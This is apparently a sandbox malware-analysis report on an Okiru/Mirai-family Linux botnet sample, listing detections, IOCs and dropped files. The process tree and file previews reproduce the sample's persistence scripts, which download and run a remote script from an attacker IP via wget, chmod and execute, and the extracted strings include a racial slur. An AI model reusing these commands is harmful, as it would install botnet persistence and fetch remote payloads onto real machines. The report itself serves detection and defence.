Edit tour

Linux Analysis Report
m68k.nn.elf

Overview

General Information

Sample name:	m68k.nn.elf
Analysis ID:	1581263
MD5:	8845ad8ddea06d04b98a1c8dc9c97c56
SHA1:	fddc02400f6189995b491b6f74f0fe0a4e9dd05b
SHA256:	233e8137b8c1b925ca40c6851777a8ddd4859a2ddbdf282d670b0a918be000e0
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581263
Start date and time:	2024-12-27 09:13:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	m68k.nn.elf
Detection:	MAL
Classification:	mal72.spre.troj.evad.linELF@0/10@2/0

Warnings

VT rate limit hit for: http://94.156.227.229/
VT rate limit hit for: http://94.156.227.229/lol.sh
VT rate limit hit for: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Runtime Messages

Command:	/tmp/m68k.nn.elf
PID:	5449
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

m68k.nn.elf (PID: 5449, Parent: 5373, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/m68k.nn.elf

m68k.nn.elf New Fork (PID: 5472, Parent: 5449)

sh (PID: 5472, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 5474, Parent: 5472)

systemctl (PID: 5474, Parent: 5472, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

m68k.nn.elf New Fork (PID: 5490, Parent: 5449)

sh (PID: 5490, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 5496, Parent: 5490)

chmod (PID: 5496, Parent: 5490, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

m68k.nn.elf New Fork (PID: 5497, Parent: 5449)

sh (PID: 5497, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 5499, Parent: 5497)

ln (PID: 5499, Parent: 5497, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

m68k.nn.elf New Fork (PID: 5500, Parent: 5449)

sh (PID: 5500, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"

m68k.nn.elf New Fork (PID: 5502, Parent: 5449)

sh (PID: 5502, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 5504, Parent: 5502)

chmod (PID: 5504, Parent: 5502, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/m68k.nn.elf

m68k.nn.elf New Fork (PID: 5505, Parent: 5449)

sh (PID: 5505, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 5507, Parent: 5505)

mkdir (PID: 5507, Parent: 5505, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

m68k.nn.elf New Fork (PID: 5508, Parent: 5449)

sh (PID: 5508, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 5513, Parent: 5508)

ln (PID: 5513, Parent: 5508, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf

udisksd New Fork (PID: 5461, Parent: 802)

dumpe2fs (PID: 5461, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5488, Parent: 5487)

snapd-env-generator (PID: 5488, Parent: 5487, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5545, Parent: 802)

dumpe2fs (PID: 5545, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
m68k.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
5449.1.00007f48dc001000.00007f48dc018000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: m68k.nn.elf PID: 5449	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: m68k.nn.elf

ReversingLabs: Detection: 15%

Source: m68k.nn.elf

String: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginnfstftpmalloc[start_pid_hopping] Failed to clone: %s

Source: /tmp/m68k.nn.elf (PID: 5449)

Socket: 0.0.0.0:38242

Jump to behavior

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: m68k.nn.elf	String found in binary or memory: http://94.156.227.229/
Source: profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, m68k.nn.elf.30.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.229/lol.sh
Source: m68k.nn.elf	String found in binary or memory: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/ud

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal72.spre.troj.evad.linELF@0/10@2/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/m68k.nn.elf (PID: 5449)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/m68k.nn.elf (PID: 5449)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 5499)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 5513)	File: /etc/rc.d/S99m68k.nn.elf -> /etc/init.d/m68k.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/m68k.nn.elf (PID: 5449)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5496)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5504)	File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/m68k.nn.elf (PID: 5472)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 5490)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 5497)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 5500)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 5502)	Shell command executed: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 5505)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 5508)	Shell command executed: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 5496)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 5504)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/m68k.nn.elf			Jump to behavior

Source: /bin/sh (PID: 5507)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 5474)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/m68k.nn.elf (PID: 5449)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5496)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5504)	File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/m68k.nn.elf (PID: 5449)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/m68k.nn.elf (PID: 5449)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 5500)	Writes shell script file to disk with an unusual file extension: /etc/init.d/m68k.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/m68k.nn.elf (PID: 5449)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 5500)	File: /etc/init.d/m68k.nn.elf			Jump to dropped file

Source: /tmp/m68k.nn.elf (PID: 5449)

Queries kernel information via 'uname':

Jump to behavior

Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/m68k/usQ
Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXX
Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmp	Binary or memory string: 5VeU5!/usr/bin/vmtoolsd
Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.QnTq7b
Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-m68k
Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmp	Binary or memory string: 4JReU/tmp/qemu-open.QnTq7b-]LReU
Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmp	Binary or memory string: 4VeU!/etc/qemu-binfmt/m68k
Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/m68k
Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmp	Binary or memory string: _4x86_64/usr/bin/qemu-m68k/tmp/m68k.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.nn.elf
Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 5449.1.00007f48dc001000.00007f48dc018000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 5449, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 5449.1.00007f48dc001000.00007f48dc018000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 5449, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
m68k.nn.elf	16%	ReversingLabs	Linux.Backdoor.Mirai

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	0%	Avira URL Cloud	safe
http://94.156.227.229/lol.sh	100%	Avira URL Cloud	malware
http://94.156.227.229/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.24	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.229/	m68k.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	m68k.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/lol.sh	profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, m68k.nn.elf.30.dr, custom.service.12.dr	false	Avira URL Cloud: malware	unknown

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	db0fa4b8db0333367e9bda3ab68b8042.arc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.24
	RpcSecurity.x86.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	.i.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	RpcSecurity.arm7.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	RpcSecurity.mpsl.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	RpcSecurity.ppc.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	RpcSecurity.arm.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	RpcSecurity.spc.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	RpcSecurity.mips.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	RpcSecurity.m68k.elf	Get hash	malicious	Unknown	Browse	162.213.35.24

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/rc.local	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	126
Entropy (8bit):	4.663487152693506
Encrypted:	false
SSDEEP:	3:KPJRXSC/ANFDDoCvLdjX43LbaaFOdFXa5O:WJRlufoYZX47baaeXCO
MD5:	908A2B9113EF8A6A2CA4E9909AA60D79
SHA1:	9E7FD1C2F22C6CEA305B379B5824B383E68602EB
SHA-256:	1BA32EE3006E9EA178B34C8B1605409BF57F0DA9663E2C08EA36F86413C2E10C
SHA-512:	9B80CD7CDB1BA13B53B9C9B254551103EBFDB907F4C18169F46880E8A1386B9BB5C70DC42CA7A239178B882EFDF037C3F21C02A4FD6E06DCBC7EB718BF5502F7
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/m68k.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/m68k.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	406
Entropy (8bit):	4.606101554109645
Encrypted:	false
SSDEEP:	12:QRkiMEXNxl8GKUJgjvMHK2FSuKN+dRRucSOyd3:vRG1ISzhYOM3
MD5:	EA049B21825DBB44516EE73049A785F0
SHA1:	F8BEB8ECB7C2CE6F8E87A4D3C15184E5CF44D906
SHA-256:	822A631C02D919ACBA742FB191641422016135DB9B6ECCBAD70771938C5EF3F3
SHA-512:	0571E58FA1B11CCEEF99E7CDCB6A7BAB9EE570DC16C566BCE2D15FDA5E730C07677389C671764BE5DB5918985FFDDB8AA942990729692730BA9344EBF3BC7A30
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/m68k.nn.elf..case "" in. start). echo 'Starting m68k.nn.elf'. /tmp/m68k.nn.elf &. wget http://94.156.227.229/lol.sh -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping m68k.nn.elf'. killall m68k.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/m68k.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	113
Entropy (8bit):	4.635913085165249
Encrypted:	false
SSDEEP:	3:TKH4vZKSC/ANFDvSDRFiLdjX43LpaKB0dFLoKE0:h8luzSXoZX47zBeLXE0
MD5:	30F0DF9AABDD5B925A99BF84CA409F8F
SHA1:	15A661E91E595D0B2731D962969D2D643EA115E2
SHA-256:	B6ABB6C1A724BC805B1156C9540115733AB2DB2DAE61BCDD0EF1A8502F51283B
SHA-512:	82F8DF62AA47B5E4EDFBBED25077FCCB24FF584EB05311AD6D90D28C09C90721A111700A59855FD7A54C513847DEA85039CCA03B8895B5969C60D5FEA913A491
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh./tmp/m68k.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	118
Entropy (8bit):	4.598017743761046
Encrypted:	false
SSDEEP:	3:nAWu58C/ANFDDoCvLdjX43LbaaFOdFXa5O:ANufoYZX47baaeXCO
MD5:	74886B7A12D12F572970E2E377DB92E8
SHA1:	B85983EB18C1572CE93C473BE48A4634181D221C
SHA-256:	1D5454DA4E60D3C773591F209004A054AED5299C9D788E8F3457B73C8181A8D5
SHA-512:	1951E7625257C5367CAAA172CA580E36670EAAB9C78AFC2CB89B2FBB9EE23B9FFC6DED2529DE89EE284A414238F5B262CDF3EFB77659750800522C02F9236AAD
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/m68k.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.487760140811423
Encrypted:	false
SSDEEP:	3:TgSC/ANFDvSDRFiLdjX43LbaaFOdFXa50:TgluzSXoZX47baaeXC0
MD5:	66B7DB5343FB9087227AEF4DDEA5ED09
SHA1:	6462EB789FBFB1C54DE9B5BC790512CB64C29738
SHA-256:	619BB214971CD309CBCFB7D3EC0C2425BA438C6D29D9CB9212639D3B549C9A1D
SHA-512:	38F2E1C9F30BB7A0FFBEC3FDB226FAAB01CFE3FEAB0C32F8825CE0E80A767E7BB14D840EE1AE529D3394C0477D99811EEE1AD74CE3A897987E892570FA595524
Malicious:	true
Reputation:	low
Preview:	/tmp/m68k.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/m68k.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: sparc.nn.elf, Detection: malicious, Browse Filename: arm7.nn-20241224-0652.elf, Detection: malicious, Browse Filename: arm.nn-20241224-0652.elf, Detection: malicious, Browse Filename: mips.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	307
Entropy (8bit):	5.074037697712534
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+xE02+GWRAZX47N2+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+xEp+GWRkKY+GWRXY+GWRuO
MD5:	2F91AB7B81C3A38F93D897D4DC7DC97D
SHA1:	EC4B9B9D494101FAA9F5AF9087782F67709BDADA
SHA-256:	57ABDA64A5D4589CF09678A9913C096A5DF4459A1730EAC6CBF28AF921226BB3
SHA-512:	38F903CE45694358A381D457EA829BC8E1DA505F27A1FB0A349FFB3A0035CC50BE547ADB316D74927C83A7EA936FDC94C1C4A9B40742E4C5DD7DA256CEF6CF85
Malicious:	false
